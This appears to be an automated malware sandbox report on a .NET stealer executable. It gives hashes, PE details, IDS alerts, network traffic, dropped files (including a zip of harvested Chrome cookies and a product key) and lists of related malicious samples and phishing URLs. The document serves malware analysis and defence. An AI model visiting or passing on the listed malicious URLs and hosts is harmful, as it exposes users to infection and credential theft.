                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 20.190.159.0, 20.190.159.64, 40.126.31.67, 20.190.159.2, 40.126.31.69, 20.190.159.4, 20.190.159.73, 20.190.159.68, 192.229.221.95, 40.113.103.199, 2.19.126.163, 2.19.126.137, 20.114.59.183, 20.3.187.198
                    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, client.wns.windows.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    05:37:08API Interceptor11452998x Sleep call for process: MSBuild.exe modified
                    05:37:09API Interceptor1x Sleep call for process: WMIC.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    34.117.59.81mek_n_bat.batGet hashmaliciousUnknownBrowse
                    • ipinfo.io/json
                    QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/json
                    z30PO1028930.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                    • ipinfo.io/ip
                    SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    IP-Grabber.ps1Get hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    BadUsb.ps1Get hashmaliciousUnknownBrowse
                    • ipinfo.io/ip
                    ZmYfQBiw.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/
                    jmdCh1Z3.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/
                    wAFWKlU1.exeGet hashmaliciousUnknownBrowse
                    • ipinfo.io/
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ipinfo.ioYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    engine.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    invoker.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    tgmes.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    x.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    invoker.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    locker.ps1Get hashmaliciousTrojanRansomBrowse
                    • 34.117.59.81
                    mek_n_bat.batGet hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    zx.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    investdirectinsurance.comYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                    • 104.21.65.79
                    SWIFT.exeGet hashmaliciousLokibotBrowse
                    • 104.21.65.79
                    SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                    • 104.21.65.79
                    fp2e7a.wpc.phicdn.netYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 192.229.221.95
                    https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    x.ps1Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    invoker.ps1Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    http://investors.spotify.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    http://apple.vn377.com/Get hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    GOOGLE-AS-APGoogleAsiaPacificPteLtdSGYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 34.117.188.166
                    8NjcvPNvUr.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 34.117.188.166
                    file.exeGet hashmaliciousUnknownBrowse
                    • 34.117.188.166
                    file.exeGet hashmaliciousUnknownBrowse
                    • 34.117.188.166
                    file.exeGet hashmaliciousUnknownBrowse
                    • 34.117.188.166
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 34.117.188.166
                    file.exeGet hashmaliciousUnknownBrowse
                    • 34.117.188.166
                    engine.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    invoker.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    CLOUDFLARENETUSYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                    • 104.21.65.79
                    rwsNDpQSKZ.exeGet hashmaliciousLummaCBrowse
                    • 188.114.97.3
                    QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 188.114.96.3
                    CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                    • 188.114.96.3
                    FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 104.26.2.16
                    8SxJ9aYfJ1.exeGet hashmaliciousFormBookBrowse
                    • 188.114.97.3
                    e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 104.26.2.16
                    file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                    • 188.114.96.3
                    https://www.kudoboard.com/boards/ZWwsi9jgGet hashmaliciousUnknownBrowse
                    • 172.67.37.149
                    NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
                    • 172.67.177.136
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    1138de370e523e824bbca92d049a3777FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 23.1.237.91
                    e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 23.1.237.91
                    https://busines-support-faceboock.cfd/contract/61558775282504Get hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    http://foodnetworkcookingprogramvontest.blogspot.com/?m=1Get hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/4e3ca076003281dc76236e73f1cc5142Get hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    http://www.linktr.ee/debank.notificationGet hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    http://pancake-swap-alpha-mu.vercel.app/Get hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    https://49moleraur.xyz/garantiGet hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/e5ea942a18732b1311810dd2e55b146b/Get hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    https://muscletherapytec.com/wp-admin/bvn2/sprom2/popular/17f299cc4b87de0e07a1fdc16d0d9e99/Get hashmaliciousUnknownBrowse
                    • 23.1.237.91
                    28a2c9bd18a11de089ef85a160da29e4https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    https://www.kudoboard.com/boards/ZWwsi9jgGet hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    http://cache.netflix.com.sg5.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    http://investors.spotify.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    http://apple.vn377.com/Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    http://apple.dogwog.com/Get hashmaliciousUnknownBrowse
                    • 40.126.32.140
                    3b5074b1b5d032e5620f69f9f700ff0eYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 34.117.59.81
                    FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 34.117.59.81
                    e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 34.117.59.81
                    file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                    • 34.117.59.81
                    SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    engine.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    invoker.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    tgmes.ps1Get hashmaliciousUnknownBrowse
                    • 34.117.59.81
                    37f463bf4616ecd445d4a1937da06e19Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                    • 172.67.189.102
                    CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                    • 172.67.189.102
                    SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                    • 172.67.189.102
                    SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                    • 172.67.189.102
                    SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                    • 172.67.189.102
                    SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                    • 172.67.189.102
                    PO Tournefortian2453525525235235623425523235.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 172.67.189.102
                    setup.exeGet hashmaliciousAmadeyBrowse
                    • 172.67.189.102
                    setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                    • 172.67.189.102
                    file.exeGet hashmaliciousVidarBrowse
                    • 172.67.189.102
                    No context
                    Process:C:\Users\user\Desktop\d34e1p5zD2.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):425
                    Entropy (8bit):5.357964438493834
                    Encrypted:false
                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                    MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                    SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                    SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                    SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                    Malicious:true
                    Reputation:moderate, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                    Process:C:\Users\user\Desktop\d34e1p5zD2.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):549888
                    Entropy (8bit):7.502053876476747
                    Encrypted:false
                    SSDEEP:12288:I9aVWlcriOTQF8tX0YJEAkd8IfhH8dcSLQqdQEIvqi:yNlcOOTQFSk0k6AhHmLQieqi
                    MD5:B2B3641A70FE1326D8DDD84E46E99395
                    SHA1:EB1D58C8DDE89171FCEAC588E3A37D35E5D5F980
                    SHA-256:8E25D81231295F18BA06626B57B68D84FA364627CA42EE5915167309F6354E1C
                    SHA-512:0F2732FA2EF017306E9CD11A3A9F0A4A9F5034D44807C435FD21FEECC70728FA7030AF5368704D594F9505607714446B5C3C2DD46206DC9252B043BAF5404193
                    Malicious:false
                    Reputation:low
                    Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+/...x;;....L..LYZL+7Ll.L..LY.L~PL.....L+.Y..f.1....r;.k.LY.L+..K.Y..LY.L~V\..LYQL+8Ll.L..LY.L~.\..$.).DLl.L.....L~.L..LY.L+.LlVL..LY.L~.N..LYoL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY.O}w&r.LY.L+e.H.L.PLY.L~.L..LY.L+..HSL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Lli....$.Z.L..7L+.LlfL..LY!L~.&r#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LY..j....L..).L~KL.LY.L+..!.Y.`LY....L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.
                    Process:C:\Users\user\Desktop\d34e1p5zD2.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):47616
                    Entropy (8bit):7.3984749546983055
                    Encrypted:false
                    SSDEEP:768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
                    MD5:3E3D6FD0B466B60CA1E91DC596C05DF3
                    SHA1:9E09372C4597A6405DF167DFE5C2671F1F62A706
                    SHA-256:8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
                    SHA-512:FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
                    Malicious:false
                    Reputation:low
                    Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+.:..w3nx.j...L..LYZL+7Ll.L..LY.L~PL.....L+.Y....1....r;.k.LY.L+.h)\L..LY.L~bZN.LYQL+8Ll.L..LY.L~.....U.L+DLl.L.....L~.L..LY..i.LlVL..LY.L~.L....oL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY..=kL.LY.L+e.H.L.PLY.L~.L..LY.L+...SL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.L.i.U~L~.L.9..7L+.LlfL..LYa.>9L.#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LYEM*-Ll.L..).L~KL.LY.L+.Ll?L.`LY{L~.L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                    Category:dropped
                    Size (bytes):596
                    Entropy (8bit):6.565717196855763
                    Encrypted:false
                    SSDEEP:12:5j+FRUCxMu94ubz6Syp0eymc4JcYpmoN8BQCx2uhQz6siX:9+FR4thCeyZ/YpmoKOS3
                    MD5:D1988178BF765C17B77F19FBAECB4B74
                    SHA1:6954704EDDF16CAEFD32744A60DE4C64F7496CAF
                    SHA-256:AFA7B14ED3D9B165DF7C36787D604299A2EB731E09BF68E557D4550B30889C3D
                    SHA-512:3BF8775C8FA7A88CF564AF197E3C14999A1E692ECE041D1D39BF556AEF8088A644A4A413724E2B4B75D2444CB13526ACD9F0C06DDFC758C434C286DAEEFC5BF5
                    Malicious:false
                    Reputation:low
                    Preview:PK.........,.X|i+........."...Others\Windows Product Key\key.txt.4.ps..s.3...7v.7.5.4v..uq.v...PK.........,.X.,......4...*...Chromium\Google Chrome\Default\Cookies.txt...rC@.......6...... e)7lb...?].....c..^....i.......Rl.........nb)h..Ad...Rf..Z..U. ....&K...U.RU..*..{."...p,.....`..l..g}.,+..{..{6E...1D.X.i0..*..y(........a......ys.`.*..N....0...j}.......]I.-.r......{K&Jb.....`.D..K?PK...........,.X|i+.........".................Others\Windows Product Key\key.txtPK...........,.X.,......4...*............._...Chromium\Google Chrome\Default\Cookies.txtPK....................
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):5.800755147755903
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:d34e1p5zD2.exe
                    File size:77'824 bytes
                    MD5:53c82aade0f798222f64759c56d0fa4d
                    SHA1:d14d3bf34129eaefcfeac6ff8e677eb74bbdf610
                    SHA256:3992e860c4c048741356c0403e3ac9ab84094249515a98c06e255b3bb256eb68
                    SHA512:6427e35ba9062b1ba942b57b1e4e095770e8c1f5a4e094f28024f47cdda64b048abe6161b73e6a75773d4226a024d95499f9c45fb8c5adcec069c937fd53feb0
                    SSDEEP:768:5nHCRK/9FZsKa1tr4j1ZL9wUWNFV3Hv2ynFzcsiDlsaAkM/wkB6V5rLeT1McytfS:5HiK/9F6aL9wDN3Hv36siSwb9CT1
                    TLSH:0A733A606BE8D127C7AE0775A07142090FB9DA4F3A53F7AB8DD828CD5D473445F20AAB
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................,..........fJ... ...`....@.. ....................................@................................
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x414a66
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A30814 [Fri Jul 26 02:21:08 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Instruction
                    jmp dword ptr [00414A74h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    dec eax
                    dec edx
                    add dword ptr [eax], eax
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc al, 08h
                    mov dword ptr [00000066h], eax
                    add byte ptr [edx], al
                    add byte ptr [eax], al
                    add byte ptr [eax+00h], bl
                    add byte ptr [eax], al
                    cwde
                    dec edx
                    add dword ptr [eax], eax
                    cwde
                    sub al, 01h
                    add byte ptr [edx+53h], dl
                    inc esp
                    push ebx
                    dec ebp
                    inc esp
                    in al, dx
                    push es
                    enter 4834h, A6h
                    inc ecx
                    jmp 00007F468BCE9D21h
                    les eax, fword ptr [ecx]
                    add byte ptr [eax], al
                    add byte ptr [ebx+3Ah], al
                    pop esp
                    push ebp
                    jnc 00007F46987C2B57h
                    jc 00007F46987C2B65h
                    pop esp
                    jc 00002B58h
                    pop esp
                    dec edi
                    outsb
                    inc esp
                    jc 00007F46987C2B5Bh
                    jbe 00007F46987C2B57h
                    pop esp
                    inc ecx
                    insd
                    bound ebp, dword ptr [ecx+65h]
                    outsb
                    je 00007F46987C2B57h
                    and byte ptr [ebp+20h], ah
                    push esp
                    jc 00007F46987C2B53h
                    bound esp, dword ptr [ecx+6Ch]
                    push 754F5C6Fh
                    je 00007F46987C2B62h
                    jne 00007F46987C2B66h
                    jnc 00007F46987C2B4Eh
                    inc ebp
                    push 00000069h
                    arpl word ptr [ecx+6Ah], sp
                    jo 00007F46987C2B57h
                    bound eax, dword ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x14a180x4c.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x14a7c0x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x14a740x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x12af00x12c0086bf5d3c8f1f67e55d33fd4ef924bb02False0.41053385416666666data5.841358057512349IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .reloc0x160000xc0x200bc453ad5a7bb08fcbca9077853abdc0eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    DLLImport
                    mscoree.dll_CorExeMain
                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                    2024-07-27T11:37:06.874456+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49722443192.168.2.5172.67.189.102
                    2024-07-27T11:38:02.067536+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973520.114.59.183192.168.2.5
                    2024-07-27T11:37:05.608206+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49721443192.168.2.5172.67.189.102
                    2024-07-27T11:37:24.558669+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972820.114.59.183192.168.2.5
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 27, 2024 11:36:59.347898006 CEST4434971240.126.32.140192.168.2.5
                    Jul 27, 2024 11:36:59.347948074 CEST4434971240.126.32.140192.168.2.5
                    Jul 27, 2024 11:36:59.347985983 CEST4434971240.126.32.140192.168.2.5
                    Jul 27, 2024 11:36:59.348018885 CEST49712443192.168.2.540.126.32.140
                    Jul 27, 2024 11:36:59.348809004 CEST4434971240.126.32.140192.168.2.5
                    Jul 27, 2024 11:36:59.348844051 CEST4434971240.126.32.140192.168.2.5
                    Jul 27, 2024 11:36:59.348874092 CEST49712443192.168.2.540.126.32.140
                    Jul 27, 2024 11:36:59.348881006 CEST4434971240.126.32.140192.168.2.5
                    Jul 27, 2024 11:36:59.348928928 CEST49712443192.168.2.540.126.32.140
                    Jul 27, 2024 11:36:59.349159002 CEST4434971240.126.32.140192.168.2.5
